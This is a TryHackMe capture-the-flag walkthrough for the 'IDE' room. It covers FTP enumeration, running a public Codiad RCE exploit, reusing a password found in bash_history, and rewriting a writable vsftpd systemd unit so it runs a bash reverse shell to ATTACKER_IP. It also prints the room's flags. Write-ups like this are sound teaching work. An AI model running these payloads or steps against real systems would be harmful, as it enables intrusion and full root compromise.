IDE Walkthrough

IDE - TryHackMe Walkthrough#

Machine Information#

CategoryValue
PlatformTryHackMe
Room NameIDE
DifficultyEasy
Operating SystemLinux
ObjectiveObtain User and Root Flags

Reconnaissance#

Target IP:

10.48.128.191

Initial Nmap Scan#

As always, we begin with a full TCP port scan.

nmap -p- --min-rate 5000 -T4 10.48.128.191

Results#

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
62337/tcp open  unknown

Interesting.

The target exposes:

  • FTP
  • SSH
  • Apache Web Server
  • Additional HTTP service on a high port

Service Enumeration#

Perform version detection.

nmap -sCV -p21,22,80,62337 10.48.128.191

Results#

21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu
80/tcp    open  http    Apache 2.4.29
62337/tcp open  http    Apache 2.4.29

Additional findings:

Anonymous FTP Login Allowed

and

Port 62337:
Codiad 2.8.4

FTP Enumeration#

Since anonymous FTP access is allowed, begin there.

Listing files reveals an unusual hidden directory.

...

Navigate inside.

cd ...
ls

A file named:

-

is discovered.

Download it.

get -

Read the contents locally.

Hey john,

I have reset the password as you have asked.
Please use the default password to login.

Also, please take care of the image file ;)

- drac

Observations#

The note reveals:

  • User: john
  • Password has been reset
  • Default credentials likely exist
  • Reference to an image file may be a hint

At this stage we have a likely username for future attacks.


Web Enumeration#

Browsing:

http://10.48.128.191

shows only the default Apache page.

Directory fuzzing against port 80 reveals nothing useful.

Attention shifts to:

http://10.48.128.191:62337

Codiad Discovery#

The service running on port 62337 is:

Codiad 2.8.4

This version is known to be vulnerable.

Searching ExploitDB:

searchsploit codiad 2.8.4

Results:

Codiad 2.8.4 - Remote Code Execution
CVE-2018-14009

Copy the exploit.

searchsploit -m 49705

Initial Access#

The FTP message suggested that John’s password had been reset.

Testing default credentials:

john : password

Successfully authenticates to Codiad.

This confirms the FTP note was intentionally leaking credentials.


Exploiting Codiad#

Execute the public exploit.

python 49705.py \
http://10.48.128.191:62337/ \
john \
password \
192.168.145.49 \
4444 \
linux

The exploit requests two listeners.

Listener One:

nc -lnvp 4444

Listener Two:

nc -lnvp 4445

After execution, a reverse shell is obtained.

www-data

Initial foothold achieved.


Shell Stabilization#

Upgrade the shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Background:

CTRL + Z

Attacker machine:

stty raw -echo
fg

Target:

export TERM=xterm

Interactive shell established.


Local Enumeration#

Enumerating user directories reveals:

/home/drac

Checking command history:

cat /home/drac/.bash_history

Contents:

mysql -u drac -p 'Th3dRaCULa1sR3aL'

Interesting.

The password appears to belong to user:

drac

Credential reuse is extremely common.


SSH Access#

Attempt SSH authentication.

Password:

Th3dRaCULa1sR3aL

Login succeeds.

Verify:

whoami

Output:

drac

User Flag#

Read the user flag.

cat user.txt

Output:

02930d21a8eb009f6d26361b2d24a466

User access obtained.


Privilege Escalation#

Checking sudo permissions:

sudo -l

Output:

User drac may run the following commands:

(ALL : ALL)
/usr/sbin/service vsftpd restart

Interesting.

The user cannot execute arbitrary commands as root.

However, they can restart the FTP service.


Service Abuse#

Inspect the service definition.

cat /lib/systemd/system/vsftpd.service

The service file is writable.

This creates an opportunity for privilege escalation.

Modify the service to execute a reverse shell as root.

Example payload:

/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1'

Insert into:

ExecStart=

Result:

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1'

Reload Systemd#

Reload service definitions.

systemctl daemon-reload

Then restart the service using the allowed sudo command.

sudo /usr/sbin/service vsftpd restart

Start listener:

nc -lvnp 7777

Connection received.

root@ide:/#

Root shell obtained.


Root Flag#

Navigate to:

cd /root

Read the flag.

cat root.txt

Output:

ce258cb16f47f1c66f0b0b77f4e0fb8d

Root compromise complete.


Flags#

User#

02930d21a8eb009f6d26361b2d24a466

Root#

ce258cb16f47f1c66f0b0b77f4e0fb8d

Attack Path Summary#

Nmap Scan
Anonymous FTP Access
Hidden FTP Directory
FTP Note Disclosure
john:password
Codiad Login
CVE-2018-14009
Reverse Shell as www-data
.bash_history Discovery
drac Credentials
SSH Access
User Flag
sudo -l
vsftpd Service Restart Permission
Service File Abuse
Root Reverse Shell
Root Flag

Key Takeaways#

  • Anonymous FTP access frequently exposes sensitive information.
  • Hidden directories on FTP servers should always be investigated.
  • Credential leakage in shell history files remains a common issue.
  • Public exploits should always be checked against discovered software versions.
  • Credential reuse can often lead directly to lateral movement or privilege escalation.
  • Misconfigured service permissions can result in full root compromise.
  • Always inspect systemd service files when service management permissions are granted.

Machine rooted successfully.


Adapted from naval0505/TryHackMe—Writeups under MIT.

Find us elsewhere

Merch, stickers, and moreSupport the work at the Solvere Labs shop